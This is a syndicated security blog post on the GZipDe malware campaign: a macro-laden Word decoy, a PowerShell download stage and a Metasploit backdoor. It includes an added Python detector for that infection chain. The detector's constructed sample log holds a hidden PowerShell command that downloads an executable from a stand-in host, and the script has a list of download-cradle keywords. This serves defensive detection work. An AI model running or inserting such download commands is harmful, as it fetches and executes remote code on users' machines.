Researchers at AlienVault have discovered a new piece of what appears to be highly targeted malware. The strain, dubbed GZipDe and most likely used in cyber-espionage campaigns, is delivered with a decoy document that reuses an article about the upcoming Shanghai Cooperation Organization Summit.
More about the GZipDe Malware Operation
About a week ago, the researchers detected a new malicious document targeting this region. The document includes a passage of text copied from that article as a decoy.
AlienVault discovered the booby-trapped Word document on VirusTotal, where it had been uploaded by a user in Afghanistan. This is how they unearthed the malware.
The booby-trapped document (a .doc file) is the first step of a multistage infection in which several servers and artifacts are deployed. The final stage of the operation appears to be the installation of a Metasploit backdoor. The more interesting component, however, is the .NET downloader, which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
The malicious document tricks users into enabling macros; once enabled, the macro executes a Visual Basic script. The script then runs PowerShell code, which downloads a PE32 executable. The process ends with the actual malware, GZipDe, the researchers reported.
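The chain described above (macro, Visual Basic script, PowerShell, downloaded executable) leaves a recognisable footprint in endpoint process-creation telemetry: an Office process spawning a script host, which in turn spawns PowerShell with a download cradle on its command line. The Python below is an added example written for this page; it is not code from AlienVault or from the original post. The log format, process names, paths and command lines are constructed for illustration and are not indicators taken from the GZipDe sample.

```python
# Added example: flag the Office -> script host -> PowerShell download chain in
# process-creation telemetry. All log lines below are CONSTRUCTED for illustration;
# they are not artefacts from the GZipDe sample or the AlienVault report.
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Substrings typical of a PowerShell download cradle (matched case-insensitively).
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|iwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # stored lower-cased so comparisons are case-insensitive
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'key=value|key=value' process-creation record (hypothetical format)."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(int(fields["pid"]), int(fields["ppid"]), fields["image"].lower(), fields["cmdline"])


def detect_macro_chain(events):
    """Return a list of (reason, event) findings.

    Two rules mirror the infection chain in the article:
      1. an Office process spawning a script host (macro -> VBS/PowerShell), and
      2. a PowerShell process whose command line contains a download cradle and whose
         ancestry includes an Office process (PowerShell -> PE32 download).
    """
    by_pid = {e.pid: e for e in events}
    findings = []

    def has_office_ancestor(e, depth=8):
        # Walk up the parent chain a bounded number of steps.
        cur = e
        for _ in range(depth):
            parent = by_pid.get(cur.ppid)
            if parent is None:
                return False
            if parent.image in OFFICE_PARENTS:
                return True
            cur = parent
        return False

    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.image in OFFICE_PARENTS and e.image in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e))
        if e.image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(e.cmdline) and has_office_ancestor(e):
            findings.append(("office_descended_powershell_download", e))
    return findings


# Constructed sample telemetry: a benign Word session (pids 4100/4200), then a macro-enabled
# document launching wscript, which launches PowerShell with a download cradle.
SAMPLE_LOG = """\
pid=4000|ppid=900|image=explorer.exe|cmdline=explorer.exe
pid=4100|ppid=4000|image=WINWORD.EXE|cmdline="WINWORD.EXE" C:\\Users\\a\\Documents\\report.docx
pid=4200|ppid=4100|image=splwow64.exe|cmdline=splwow64.exe 12288
pid=5100|ppid=4000|image=WINWORD.EXE|cmdline="WINWORD.EXE" C:\\Users\\a\\Downloads\\summit.doc
pid=5200|ppid=5100|image=wscript.exe|cmdline=wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\x.vbs
pid=5300|ppid=5200|image=powershell.exe|cmdline=powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe','$env:TEMP\\p.exe')"
"""


def run(log_text: str = SAMPLE_LOG):
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    return detect_macro_chain(events)


if __name__ == "__main__":
    for reason, ev in run():
        print(f"{reason}: pid={ev.pid} {ev.image} :: {ev.cmdline}")
```

Rule 1 alone will also fire on legitimate add-ins that launch cmd.exe from Office, so in production it is usually scored rather than alerted on; rule 2, which requires both the Office ancestry and a download cradle, is the higher-confidence signal for the chain this article describes.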
GZipDe is written in .NET and is designed to use “a custom encryption method to obfuscate process memory and evade antivirus detection.” Since GZipDe acts as a downloader, it fetches a more dangerous payload from a remote server. During the researchers’ investigation that server was no longer reachable, which would normally end the analysis. However, it turned out that Shodan, the IoT search engine, had indexed the server and even recorded (Read more...)
*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum authored by Milena Dimitrova. Read the original post at: https://sensorstechforum.com/gzipde-malware-metasploit-backdoor/